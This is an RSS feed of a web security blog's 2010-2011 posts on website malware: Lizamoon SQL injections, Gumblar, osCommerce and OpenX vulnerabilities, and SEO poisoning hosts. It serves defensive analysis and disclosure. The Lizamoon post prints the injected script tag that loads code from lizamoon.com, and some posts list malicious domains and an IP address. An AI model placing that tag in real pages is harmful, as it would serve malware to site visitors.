<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:creativeCommons="http://backend.userland.com/creativeCommonsRssModule"
>

<channel>
	<title>White Fir Design Web Security Blog &#187; Website Malware</title>
	<atom:link href="http://www.whitefirdesign.com/blog/category/website-malware/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.whitefirdesign.com/blog</link>
	<description>A critcal look at the state of website security.</description>
	<lastBuildDate>Mon, 06 Feb 2012 19:51:18 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
<creativeCommons:license>http://creativecommons.org/licenses/by-nc-sa/3.0/us/</creativeCommons:license>
		<item>
		<title>The Hype Surrounding &#8220;Massive&#8221; Malware SQL Injections</title>
		<link>http://www.whitefirdesign.com/blog/2011/04/05/the-hype-surrounding-massive-malware-sql-injections/</link>
		<comments>http://www.whitefirdesign.com/blog/2011/04/05/the-hype-surrounding-massive-malware-sql-injections/#comments</comments>
		<pubDate>Tue, 05 Apr 2011 20:37:17 +0000</pubDate>
		<dc:creator>White Fir Design</dc:creator>
				<category><![CDATA[Website Malware]]></category>

		<guid isPermaLink="false">http://www.whitefirdesign.com/blog/?p=970</guid>
		<description><![CDATA[Every so often there is another round of a fairly unsophisticated SQL injection that places malware scripts into poorly coded websites occurs and then there is a enviably a security company that hypes the infections and flood of new stories &#8230; <a href="http://www.whitefirdesign.com/blog/2011/04/05/the-hype-surrounding-massive-malware-sql-injections/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>Every so often there is another round of a fairly unsophisticated SQL injection that places malware scripts into poorly coded websites occurs and then there is a enviably a security company that hypes the infections and flood of new stories about it.  Another round of the infection occurred in the last week, dubbed Lizamoon by Websense who is the company to hype this round (we previously discussed <a title="Websense Threat Report Repeats False Claims of WordPress Hackings" href="http://www.whitefirdesign.com/blog/2010/11/15/websense-threat-report-repeats-false-claims-of-wordpress-hackings/">Websense’s false claims of WordPress security issues</a>). From what we have seen dealing with malware infected websites and other data confirms is that these &#8220;massive&#8221; infections are not massive as they are claimed to be each time, in fact they are of average size for a malware infection of websites. Most of those average size malware infections never receive any press coverage. The reason these attacks seems to receive the coverage is because of the use of Google search results to provide a large but highly inaccurate measure of the size of the infection.</p>
<p>The most important thing to understand about these infections, and this often not mentioned, is that they are completely preventable by properly sanitizing user input data that will be sent to a database. Anyone coding should be well aware of this the possibility of a SQL injection , these specific attacks have been occurring for years, and take the necessary precautions. Prevent SQL injections is one of key things mentioned in our article on <a href="http://www.whitefirdesign.com/resources/secure-your-website-from-hackers.html">securing your website from hackers</a>. Widely used software like WordPress, Drupal, and Joomla are not susceptible to such a basic SQL injection. Unfortunately, even websites that get hit often don’t bother to take the necessary precautions to prevent these SQL injections. Instead, they often just remove the code from the database. There are also unethical website malware removal companies that will remove the infection from the database without insuring the SQL injection vulnerability has been fixed.</p>
<p>Normally you cannot search for a malware using Google’s search engine. This is due the fact Google only makes a web page’s text content searchable and not the HTML code that makes up the page. The malware either consists of a script of iframe tag, both of with are HTML code that would not be searchable. What happens with these injections is that they get placed throughout out the database, in some instances they are placed in a location where the code from the database is escaped while the web page is being generated. So in the source code it would look like</p>
<blockquote><p>&amp;lt;script src=http://lizamoon.com/ur.php&amp;gt;&amp;lt;/script&amp;gt;</p></blockquote>
<p>instead of</p>
<blockquote><p>&lt;script src=http://lizamoon.com/ur.php&gt;&lt;/script&gt;</p></blockquote>
<p>.Because the code has been escaped it will appear as text in the pages and therefore be searchable. When the code is placed into the website in escaped form it is not infectious.</p>
<p>There are several problems with trying to use Google search results to measure the size infection:</p>
<ul class="circle">
<li>The number that Google provides in an estimate, it’s not all clear how accurate it is. If you include duplicate pages currently you can only see 604 results for the search &#8220;&lt;script src=http://lizamoon.com/ur.php&gt;&lt;/script&gt;&#8221; despite there being &#8220;about 1,470,000 results&#8221;.</li>
<li>The number includes any page, like this one, that mentions the code.</li>
<li>Not all pages that have the code are actually infection, because the code only searchable if it escaped. So it would require that another instance that is not escaped be one the page for it to be infectious. We checked the first 10 results for the search &#8220;&lt;script src=http://lizamoon.com/ur.php&gt;&lt;/script&gt;&#8221; which were still injected and found that only four of them were infectious.</li>
<li>Most malware infections are not measurable using search results making a comparison with them impossible using the metric.</li>
<li>Web pages are not a good measure of the reach of a malware infection. A page could be accessed millions of times a day or never.</li>
</ul>
<p>The ideal way to measure the size of a malware infection would be to determine how many times each pages with the malware would be accessed. There is not a tool able to do this and there is unlikely to be one.  What we have found to best indicator available to measure the size of a malware infection size is Google Safe Browsing system. This system scans web pages from across the Internet for malware. This data is used to block infected websites in Google’s search results and is also used for malware protection in the FireFox, Chrome, and Safari web browsers.  It does not scan all websites and does not scan all of the websites it does scan equally, so the number won’t include every infected website. Google doesn’t indicate what criteria it uses to determine how often it scan various, but in general it scans more popular website more often so it should provide a good measure of how many website that people are likely to access were infected. At the moment the system <a href="http://www.google.com/safebrowsing/diagnostic?site=lizamoon.com">reports that lizamoon.com has infected 1436 domains</a>. That is far lower than the nearly 4 million websites claimed to have been infected according to <a href="http://money.cnn.com/2011/04/01/technology/lizamoon/index.htm">one source</a>, far lower than the 1,470,000 reported for a search on &#8220;&lt;script src=http://lizamoon.com/ur.php&gt;&lt;/script&gt;&#8221;, and far lower than &#8220;hundreds of thousands of domains&#8221; <a href="http://www.eweek.com/c/a/Security/LizaMoon-Mass-SQL-Injection-Attack-Escalates-Out-of-Control-378108/">claimed by Websense</a>. By comparison, the IP address 86.55.140.203 that is called by a <a href="http://www.whitefirdesign.com/resources/try-pick-colors-oscommerce-malware-hack.html">infection</a> that has recently been hitting many osCommerce based websites is <a href="http://www.google.com/safebrowsing/diagnostic?site=86.55.140.0/">reported to have acted as an intermediary for 2957 sites</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.whitefirdesign.com/blog/2011/04/05/the-hype-surrounding-massive-malware-sql-injections/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	<creativeCommons:license>http://creativecommons.org/licenses/by-nc-sa/3.0/us/</creativeCommons:license>
	</item>
		<item>
		<title>Clearing Up Recent Information about Gumblar (Kroxxu) Malware</title>
		<link>http://www.whitefirdesign.com/blog/2010/11/23/clearing-up-recent-information-about-gumblar-kroxxu-malware/</link>
		<comments>http://www.whitefirdesign.com/blog/2010/11/23/clearing-up-recent-information-about-gumblar-kroxxu-malware/#comments</comments>
		<pubDate>Tue, 23 Nov 2010 23:19:07 +0000</pubDate>
		<dc:creator>White Fir Design</dc:creator>
				<category><![CDATA[Website Malware]]></category>

		<guid isPermaLink="false">http://www.whitefirdesign.com/news/?p=830</guid>
		<description><![CDATA[Avast has released a new analysis of the latest variant of the Gumblar ( which Avast refers to as Kroxxu) malware. This analysis and the media coverage of it contains some misleading information about the malware. Some of the media &#8230; <a href="http://www.whitefirdesign.com/blog/2010/11/23/clearing-up-recent-information-about-gumblar-kroxxu-malware/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>Avast has <a href="http://www.avast.com/pr-avast-kroxxu-botnet-infects-100000-domains-without-a-money-trail">released a new analysis</a> of the latest variant of the <a href="http://www.whitefirdesign.com/resources/gumblar-malware.html">Gumblar ( which Avast refers to as Kroxxu) malware</a>. This analysis and the media coverage of it contains some misleading information about the malware.</p>
<p>Some of the media coverage has claimed this new or newly detected, but this variant has been around since October of 2009 and was detected at the time.</p>
<p>Avast emphasizes that the malware makes use of redirection to making the malware sound more nefarious and advanced than it actually is. The malware is not the only malware to use redirection. Other malware makes use of redirection as part of it basic setup, whereas Gumblar&#8217;s is a by-product of how it operates. It is not an attempt to hide the malware as Avast believes is possibly the case or a glitch as they also believe is possible. Instead of hosting the code that infects user&#8217;s computers on server controlled by the person(s) behind the malware, as is the standard practice, the code is placed on some of the websites that they have compromised. The websites they use for this purpose are frequently changed and when they switch they set the old ones to redirect to the new ones. Gumblar updates the other infected websites to call these new infected websites, but leaves calls to the old website in JavaScript files leading to the redirects.</p>
<p>Avast refers to infected servers, but the malware does not affect the servers at all instead affecting individual websites hosted on a server. This is an important distinction because on shared servers Gumblar would not infect other websites which it does not have FTP credentials for. Avast claims that there is &#8220;difficulty in removing&#8221; it, which is not true. If a clean backup is available the website can simply be reverted to that. If that is not available the malware code needs to be removed from the files, which is no more difficult than any of malware added to websites. More sophisticated malware does infect the server itself, making it more  difficult to clean.</p>
<p>Avast also emphasizes that the infections have remained on websites for long periods of time, which is true, but this is not out of the ordinary for website malware.</p>
<p>While it is difficult to measure the size of website malware infections, Avast currently claimed and historical size is not above the level of many of the larger malware infections.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.whitefirdesign.com/blog/2010/11/23/clearing-up-recent-information-about-gumblar-kroxxu-malware/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	<creativeCommons:license>http://creativecommons.org/licenses/by-nc-sa/3.0/us/</creativeCommons:license>
	</item>
		<item>
		<title>osCommerce 2.3 Includes Fixes for Security Vulnerabilities and Security Enhancements</title>
		<link>http://www.whitefirdesign.com/blog/2010/11/19/oscommerce-2-3-includes-fixes-for-security-vulnerabilities-and-security-enhancements/</link>
		<comments>http://www.whitefirdesign.com/blog/2010/11/19/oscommerce-2-3-includes-fixes-for-security-vulnerabilities-and-security-enhancements/#comments</comments>
		<pubDate>Fri, 19 Nov 2010 22:27:11 +0000</pubDate>
		<dc:creator>White Fir Design</dc:creator>
				<category><![CDATA[osCommerce]]></category>
		<category><![CDATA[Website Malware]]></category>
		<category><![CDATA[Website Security]]></category>

		<guid isPermaLink="false">http://www.whitefirdesign.com/news/?p=821</guid>
		<description><![CDATA[More that two and half years after the last version of osCommerce was released and more than a year after a serious security vulnerability was discovered a new version of osCommerce has been released. The new version 2.3 was released &#8230; <a href="http://www.whitefirdesign.com/blog/2010/11/19/oscommerce-2-3-includes-fixes-for-security-vulnerabilities-and-security-enhancements/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>More that two and half years after the last version of osCommerce was released and more than a year after a serious security vulnerability was discovered a new version of osCommerce has been released. The new <a href="http://www.oscommerce.com/about/news,134">version 2.3</a> was released last Friday and <a href="http://www.oscommerce.com/about/news,135">version 2.3.1</a>, a minor maintenance release, was released two days later.</p>
<p>osCommerce has been a frequent target for hackers lately, mainly being used to spread malware, due to a number of security vulnerabilities. Version 2.3 of osCommerce removed a vulnerable file, file_manager.php, another vulnerable file has been changed to remove the vulnerability, and a vulnerability that allowed bypassing the login system has been fixed.</p>
<p>Unfortunately, it does not appear that osCommerce has decided that admin directory should be secure by default.  They are still recommending that the admin directory be renamed and  password protection be enabled on the directory. If the admin directory was secure, as it should be, neither of these should be necessary. The only other major web software that recommends renaming the admin directory as standard practice is Zen Cart and none recommend password protecting the directory as standard practice. Zen Cart display a prominent warning if the admin directory has not been renamed, osCommerce provides no warning if the admin has not been renamed or password protection of the admin directory has not been enabled. osCommerce does support renaming the admin directory during the installation process (on the Online Store Settings page) and makes it possible to enable password protection of the directory by just changing a configuration setting (located at configuration&gt;administrators).</p>
<p>The new version also includes a number of security enhancements. The <a href="http://www.openwall.com/phpass/">Portable PHP hashing framework</a> has been added to more securely hash passwords, this software is also used in WordPress. A customer session token has been added  &#8220;to forms to protect against Cross-Site Request Forgeries (CSRF)&#8221;. A new section of the admin, Security Directory Permissions, displays the current write permission of the various osCommerce directories and what are the recommend permissions are. A built-in version checker allows for checking if a new version of osCommerce has been released.</p>
<p>If you are running an older version of osCommerce and are not upgrading immediately you should secure your website by <a href="http://www.whitefirdesign.com/news/2010/10/07/the-security-step-every-oscommerce-website-needs-to-take-now/">renaming and password protecting the admin directory</a> if you have not already done so.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.whitefirdesign.com/blog/2010/11/19/oscommerce-2-3-includes-fixes-for-security-vulnerabilities-and-security-enhancements/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	<creativeCommons:license>http://creativecommons.org/licenses/by-nc-sa/3.0/us/</creativeCommons:license>
	</item>
		<item>
		<title>Hetzner Online Hosts Critical Component of SEO Poisoning Campaign</title>
		<link>http://www.whitefirdesign.com/blog/2010/11/16/hetzner-online-hosts-critical-component-of-seo-poisoning-campaign/</link>
		<comments>http://www.whitefirdesign.com/blog/2010/11/16/hetzner-online-hosts-critical-component-of-seo-poisoning-campaign/#comments</comments>
		<pubDate>Tue, 16 Nov 2010 20:00:01 +0000</pubDate>
		<dc:creator>White Fir Design</dc:creator>
				<category><![CDATA[Website Malware]]></category>
		<category><![CDATA[Website Security]]></category>

		<guid isPermaLink="false">http://www.whitefirdesign.com/news/?p=815</guid>
		<description><![CDATA[Hetzner Online, a large German hosting provider, provides hosting for three  websites that are critical for a major SEO poisoning campaign. SEO poisoning involves getting web pages listed in search engines that when accessed attempt to infect the computer with &#8230; <a href="http://www.whitefirdesign.com/blog/2010/11/16/hetzner-online-hosts-critical-component-of-seo-poisoning-campaign/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>Hetzner Online, a large German hosting provider, provides hosting for three  websites that are critical for a major SEO poisoning campaign. SEO  poisoning involves getting web pages listed in search engines that when  accessed attempt to infect the computer with malware.</p>
<p>This <a href="http://www.whitefirdesign.com/resources/security-threat-analysis-seo-poisoning-malware.html">particular  campaign</a> involves two sets of hacked websites and the websites  hosted by Hetzner Online. The first set of websites has been hacked to  display the content from a file requested from getalllinks.info,  dvc44ftgr.com, or uniteddomainsweb.com when a page from the hacked  website is requested by a search engine. The files from  getalllinks.info, dvc44ftgr.com, and uniteddomainsweb.com, hosted by  Hetzner Online at the IP address 78.46.71.6, include links to pages on  the second set of hacked websites. The content of those files can be  seen at <a href="http://www.getalllinks.info/links/0.txt">http://www.getalllinks.info/links/0.txt</a>,  <a href="http://www.dvc44ftgr.com/links/0.txt">http://www.dvc44ftgr.com/links/0.txt,</a> or  and <a href="http://www.uniteddomainsweb.com/links/0.txt">http://www.uniteddomainsweb.com/links/0.txt</a>. Search  engines crawl those pages on the second set of hacked websites and they  get included in search engines results.  When people access the pages  through search engines they are redirected to fake anti-virus scanner  that attempts to infect their computers with malware. Without the three  domains hosted by Hetzner Online the pages on the second set of websites are  never crawled and never get included in the search results where the  could be accessed by users.</p>
<p>We contacted Hetzner Online about the issue a month ago. We receive a message acknowledging our message, but they have taken no action beyond that. Hetzner Online is not the first prominent host to have provided service for this SEO poisoning campaign. The Planet previously <a href="http://www.whitefirdesign.com/news/2010/08/16/the-planet-hosts-critical-component-of-seo-poisoning-campaign/">provided service for these domains</a> and continued to host these domains for three months after we contacted them.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.whitefirdesign.com/blog/2010/11/16/hetzner-online-hosts-critical-component-of-seo-poisoning-campaign/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	<creativeCommons:license>http://creativecommons.org/licenses/by-nc-sa/3.0/us/</creativeCommons:license>
	</item>
		<item>
		<title>Websense Threat Report Repeats False Claims of WordPress Hackings</title>
		<link>http://www.whitefirdesign.com/blog/2010/11/15/websense-threat-report-repeats-false-claims-of-wordpress-hackings/</link>
		<comments>http://www.whitefirdesign.com/blog/2010/11/15/websense-threat-report-repeats-false-claims-of-wordpress-hackings/#comments</comments>
		<pubDate>Mon, 15 Nov 2010 17:35:46 +0000</pubDate>
		<dc:creator>White Fir Design</dc:creator>
				<category><![CDATA[Website Malware]]></category>
		<category><![CDATA[Website Security]]></category>
		<category><![CDATA[WordPress]]></category>

		<guid isPermaLink="false">http://www.whitefirdesign.com/news/?p=810</guid>
		<description><![CDATA[In Websense&#8217;s 2010 Threat Report they listed WordPress Attacks as on of the significant events of the year. They also claimed that WordPress &#8220;was hacked numerous times in 2010&#8243;. While its true that some outdated WordPress installations were hacked during &#8230; <a href="http://www.whitefirdesign.com/blog/2010/11/15/websense-threat-report-repeats-false-claims-of-wordpress-hackings/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>In Websense&#8217;s 2010 Threat Report they listed WordPress Attacks as on of the <a href="http://www.websense.com/content/threat-report-2010-wordpress.aspx">significant events of the year</a>. They also claimed that WordPress &#8220;was hacked numerous times in 2010&#8243;. While its true that some outdated WordPress installations were hacked during the year (as they and other web software have been for years), the hacks that they refer to in their report, which were much larger than any actual hacks of WordPress, were not hacks of WordPress at all. The hacks they refer to were actually hacks that targeted hosting providers that would allow malicious code to be added to websites hosted with the provider whether they were running WordPress, other software, or no software at all.</p>
<p>In most of the hacks the malicious code was placed in all files that had a .php extension. WordPress, by the nature of being the most popular web software, was the most of often affected, but all web software that have files with a .php extension were also affected. In other cases the hacks targeted database fields specific to WordPress, but they could have affected any other software that utilized a database if the hacker had chose to target them instead of WordPress.</p>
<p>Websense is not alone is making these false claims, other supposed security experts also made similar claims and some hosting provider have attempted to lame blame on WordPress. Network Solutions was the only one to later <a href="http://blog.networksolutions.com/2010/wordpress-is-not-the-issue/">apologize for blaming WordPress</a>.</p>
<p>Websense also claimed that &#8220;numerous vulnerabilities were known to exist during the height of the attacks&#8221;. Seeing as WordPress was not hacked as claimed, the claimed numerous vulnerabilities also don&#8217;t exist. In fact during the year the only security vulnerability that required the release of a new version of WordPress was one that allowed <a href="http://wordpress.org/news/2010/02/wordpress-2-9-2/">&#8220;logged in users can peek at trashed posts belonging to other authors&#8221;</a>. This vulnerability would not have allowed the WordPress installation to have been hacked.</p>
<p>Making false claims about WordPress&#8217;s security damages WordPress reputation without improving security. In fact it may have the effect of decreasing security, as it may lead to people to use software that does not focus on security as well as WordPress does. WordPress responds quickly to security issues, automatically informs users of upgrade within their software, and makes it relatively easy to upgrade the software as well. By comparison two web software apps that have actually had major hackings in 2010 have not responded properly, osCommerce has chosen not release a patch for their security vulnerabilities and OpenX has <a href="http://www.whitefirdesign.com/news/2010/10/25/deletion-of-ofc_upload_image-php-causes-failure-of-openx-upgrade/">recommend a fix for a vulnerablility</a> that actually causes future upgrades to fail.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.whitefirdesign.com/blog/2010/11/15/websense-threat-report-repeats-false-claims-of-wordpress-hackings/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	<creativeCommons:license>http://creativecommons.org/licenses/by-nc-sa/3.0/us/</creativeCommons:license>
	</item>
		<item>
		<title>Deletion of ofc_upload_image.php Causes Failure of OpenX Upgrade</title>
		<link>http://www.whitefirdesign.com/blog/2010/10/25/deletion-of-ofc_upload_image-php-causes-failure-of-openx-upgrade/</link>
		<comments>http://www.whitefirdesign.com/blog/2010/10/25/deletion-of-ofc_upload_image-php-causes-failure-of-openx-upgrade/#comments</comments>
		<pubDate>Mon, 25 Oct 2010 16:15:23 +0000</pubDate>
		<dc:creator>White Fir Design</dc:creator>
				<category><![CDATA[OpenX]]></category>
		<category><![CDATA[Website Malware]]></category>
		<category><![CDATA[Website Security]]></category>

		<guid isPermaLink="false">http://www.whitefirdesign.com/news/?p=798</guid>
		<description><![CDATA[Last month it was disclosed that there was a vulnerability in the Video Ads plugin for OpenX. The vulnerability is contained in the ofc_upload_image.php file located in/www/admin/plugins/videoReport/lib/ofc2/ directory and is currently being exploited to cause ad servers to include malware &#8230; <a href="http://www.whitefirdesign.com/blog/2010/10/25/deletion-of-ofc_upload_image-php-causes-failure-of-openx-upgrade/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>Last month it was disclosed that there was a vulnerability in the Video Ads plugin for OpenX. The vulnerability is contained in the ofc_upload_image.php file located in/www/admin/plugins/videoReport/lib/ofc2/ directory and is currently being exploited to cause ad servers to include malware on the banner pages they serve. The Video Ads plugin was first included with OpenX in version 2.8.4 and the version included with 2.8.5 and 2.8.6 also contained the vulnerability. The version including in OpenX 2.8.7 does not include the vulnerability, the ofc_upload_image.php file is empty.</p>
<p>In the Product Updates page listing for OpenX 2.8.7, in the OpenX admin interface,  it states:</p>
<blockquote><p>If you recently upgraded to version 2.8.6, you can simply install an  upgraded video ad plug-in available [here] or remove the following file:  <em>admin/plugins/videoReport/lib/ofc2/ofc_upload_image.php</em> from  your installation.</p></blockquote>
<p>Others have also made the suggestion that should delete the file. You should <strong>not</strong> delete the file as this will cause future upgrades of OpenX to fail. Instead, if you are running version 2.8.6 and are not upgrading to version 2.8.7 you should delete the content of the file but not the file itself. If you are currently running version 2.8.5 or below you should upgrade to 2.8.7 as those versions contain other security vulnerabilities.</p>
<p>If you have not done an upgrade since deleting the file adding an empty file named ofc_upload_image.php in the /www/admin/plugins/videoReport/lib/ofc2/ directory will prevent a future upgrade from failing.</p>
<p>If you are currently doing an upgrade and are receiving a red box that says &#8220;One or more plugin files couln&#8217;t be located, check the install.log file for more information&#8221; after you enter the path on the page that says &#8220;Provide the path to your previous OpenX installation.&#8221; you need to add an empty file named ofc_upload_image.php in the  /www/admin/plugins/videoReport/lib/ofc2/ directory and then reenter the path. If you are not sure what the path is you can find it in the configuration file. The path is listed in the webDir parameter, make sure to remove the /www/images from the end of the path listed in the parameter.</p>
<p>If you previously attempted the upgrade and now receive a message that says &#8220;Your OpenX database and file structure are both using the most recent  version and therefore no upgrade is required at this time. Please click  Continue to proceed to the OpenX administration panel.&#8221; when you tried to try to perform the upgrade again you have two options. For the first, you will need to change the value of the oa_version record, in the _application_variable table of the database used by OpenX , to version number of OpenX you are currently running and then you need to start the upgrade process again (including deleting the new installation and then uploading a new copy of it). For the second, you will need replace the old OpenX installation with the new one and then you will then need to manually reinstall the plugins. The plugin installation files can be found in the /etc/plugins directory of the OpenX download.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.whitefirdesign.com/blog/2010/10/25/deletion-of-ofc_upload_image-php-causes-failure-of-openx-upgrade/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
	<creativeCommons:license>http://creativecommons.org/licenses/by-nc-sa/3.0/us/</creativeCommons:license>
	</item>
		<item>
		<title>The Security Step Every osCommerce Website Needs To Take Now</title>
		<link>http://www.whitefirdesign.com/blog/2010/10/07/the-security-step-every-oscommerce-website-needs-to-take-now/</link>
		<comments>http://www.whitefirdesign.com/blog/2010/10/07/the-security-step-every-oscommerce-website-needs-to-take-now/#comments</comments>
		<pubDate>Thu, 07 Oct 2010 21:01:09 +0000</pubDate>
		<dc:creator>White Fir Design</dc:creator>
				<category><![CDATA[osCommerce]]></category>
		<category><![CDATA[Website Malware]]></category>
		<category><![CDATA[Website Security]]></category>

		<guid isPermaLink="false">http://www.whitefirdesign.com/news/?p=774</guid>
		<description><![CDATA[osCommerce has had known security issue for some time and we have seen websites that have been have exploited  for some time as well. We have recently seen a spike in websites being exploited. The security issue, which has been &#8230; <a href="http://www.whitefirdesign.com/blog/2010/10/07/the-security-step-every-oscommerce-website-needs-to-take-now/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>osCommerce has had known security issue for some time and we have seen websites that have been have  exploited  for some time as well. We have recently seen a spike in websites being exploited. The security issue, which has been known about since at least July of 2009, allows a hacker to add files to the website by exploiting a vulnerability in a file located in the admin directory. Some of the files added to the websites are backdoor scripts that allow the hacker to make modifications to the website. We have seen this vulnerability exploited by hackers to add malware, spam, and phishing pages to websites.</p>
<p>There is not fix for the  issues and it does not appear that there the osCommerce developers are going to create one. While the best solution would be to move to software that  addresses security issues, a workaround that will make it very hard for  them to be exploited is to rename and password protect the admin directory. Most hacking attempts will attempt to exploit the vulnerability at the default admin directory location and will not look for the admin directory at another location. By password protecting the directory, the hacker would have to guess the username and password for the directory before being able to exploit the vulnerability. You will also need to update the /includes/configure.php file located in admin directory with the new admin directory name, after you have renamed the directory. You can read more about implementing this in a <a href="http://forums.oscommerce.com/index.php?showtopic=340995">topic</a> on the osCommerce forum<a rel="nofollow" href="http://forums.oscommerce.com/index.php?showtopic=340995"></a>. Another <a href="http://forums.oscommerce.com/topic/313323-how-to-secure-your-site/">topic</a> on the forum provides more information on securing osCommerce.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.whitefirdesign.com/blog/2010/10/07/the-security-step-every-oscommerce-website-needs-to-take-now/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	<creativeCommons:license>http://creativecommons.org/licenses/by-nc-sa/3.0/us/</creativeCommons:license>
	</item>
		<item>
		<title>Google Continues To Index Pages From SEO Poisoning Campaign</title>
		<link>http://www.whitefirdesign.com/blog/2010/09/27/google-continues-to-index-pages-from-seo-poisoning-campaign/</link>
		<comments>http://www.whitefirdesign.com/blog/2010/09/27/google-continues-to-index-pages-from-seo-poisoning-campaign/#comments</comments>
		<pubDate>Mon, 27 Sep 2010 20:12:18 +0000</pubDate>
		<dc:creator>White Fir Design</dc:creator>
				<category><![CDATA[Website Malware]]></category>

		<guid isPermaLink="false">http://www.whitefirdesign.com/news/?p=767</guid>
		<description><![CDATA[Google continues to include in its search index, pages from a major SEO poisoning campaign. SEO poisoning involves getting web pages listed in search engines that when accessed attempt to infect the computer with malware. We have repeatedly reported a &#8230; <a href="http://www.whitefirdesign.com/blog/2010/09/27/google-continues-to-index-pages-from-seo-poisoning-campaign/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>Google continues to include in its search index, pages from a <a href="http://www.whitefirdesign.com/resources/security-threat-analysis-seo-poisoning-malware.html">major SEO poisoning campaign</a>. SEO poisoning involves getting web pages listed in search engines that  when accessed attempt to infect the computer with malware. We have repeatedly reported a listing of pages used by this campaign, that is available at <a href="http://www.getalllinks.info/links/0.txt">http://www.getalllinks.info/links/0.txt</a>, to Google using their page for <a href="http://www.google.com/safebrowsing/report_badware/">reporting a malware page</a> over a period of several months.  Google has continued to list these pages in its index leading to an unknown, but possibly large number of computers to become infected with malware . These page have also not been flagged as being malicious by Google&#8217;s Safe Browsing system during the period when they are most likely to be infect users computers.</p>
<p>Our recent experience has shown that public releasing the information get Google to respond, while there reporting mechanisms get ignored. We recently posted about <a href="http://www.whitefirdesign.com/news/2010/09/16/google-sites-hosts-files-used-in-attempted-hackings/">Google providing hosting for files used in attempted hackings,</a> after having reporting using their mechanism multiple times without any action being taken Google disabled the account the day after our posting.</p>
<p>Other companies have allowed this SEO poisoning campaign to continue,  including <a href="http://www.whitefirdesign.com/news/2010/08/16/the-planet-hosts-critical-component-of-seo-poisoning-campaign/">The  Planet who provides hosting for a critical component of the campaign</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.whitefirdesign.com/blog/2010/09/27/google-continues-to-index-pages-from-seo-poisoning-campaign/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	<creativeCommons:license>http://creativecommons.org/licenses/by-nc-sa/3.0/us/</creativeCommons:license>
	</item>
		<item>
		<title>Google Sites Hosts Files Used In Attempted Hackings</title>
		<link>http://www.whitefirdesign.com/blog/2010/09/16/google-sites-hosts-files-used-in-attempted-hackings/</link>
		<comments>http://www.whitefirdesign.com/blog/2010/09/16/google-sites-hosts-files-used-in-attempted-hackings/#comments</comments>
		<pubDate>Thu, 16 Sep 2010 17:49:54 +0000</pubDate>
		<dc:creator>White Fir Design</dc:creator>
				<category><![CDATA[Google]]></category>
		<category><![CDATA[Website Malware]]></category>
		<category><![CDATA[Website Security]]></category>

		<guid isPermaLink="false">http://www.whitefirdesign.com/news/?p=762</guid>
		<description><![CDATA[Since June, Google has provided hosting for files used in attempted hackings of websites through an account with their Google Sites services. A listing of all the files hosted is available at http://sites.google.com/site/nurhayatisatu/system/app/pages/recentChanges?offset=25. Some of those files are used in &#8230; <a href="http://www.whitefirdesign.com/blog/2010/09/16/google-sites-hosts-files-used-in-attempted-hackings/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>Since June, Google has provided hosting for files used in attempted hackings of websites through an account with their Google Sites services. A listing of all the files hosted is available at <a href="http://sites.google.com/site/nurhayatisatu/system/app/pages/recentChanges?offset=25">http://sites.google.com/site/nurhayatisatu/system/app/pages/recentChanges?offset=25</a>. Some of those files are used in remote files inclusion (RFI) attacks which seek exploit vulnerabilities in software that allow remotely hosted files to be be executed. If the attacks are successful modifications are made to website that place spam or malware on the website, or allows the hacker remote access to the website. Attempting hackings utilizing these files have occurred at least as recently as three days ago. We have reported this to Google using the &#8220;Report Abuse&#8221; link multiple times but the files have continued to remain up.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.whitefirdesign.com/blog/2010/09/16/google-sites-hosts-files-used-in-attempted-hackings/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	<creativeCommons:license>http://creativecommons.org/licenses/by-nc-sa/3.0/us/</creativeCommons:license>
	</item>
		<item>
		<title>OpenX Continues To Release Updates Without Details of Changes</title>
		<link>http://www.whitefirdesign.com/blog/2010/09/16/openx-continues-to-release-updates-without-details-of-changes/</link>
		<comments>http://www.whitefirdesign.com/blog/2010/09/16/openx-continues-to-release-updates-without-details-of-changes/#comments</comments>
		<pubDate>Thu, 16 Sep 2010 17:24:00 +0000</pubDate>
		<dc:creator>White Fir Design</dc:creator>
				<category><![CDATA[OpenX]]></category>
		<category><![CDATA[Website Malware]]></category>
		<category><![CDATA[Website Security]]></category>

		<guid isPermaLink="false">http://www.whitefirdesign.com/news/?p=758</guid>
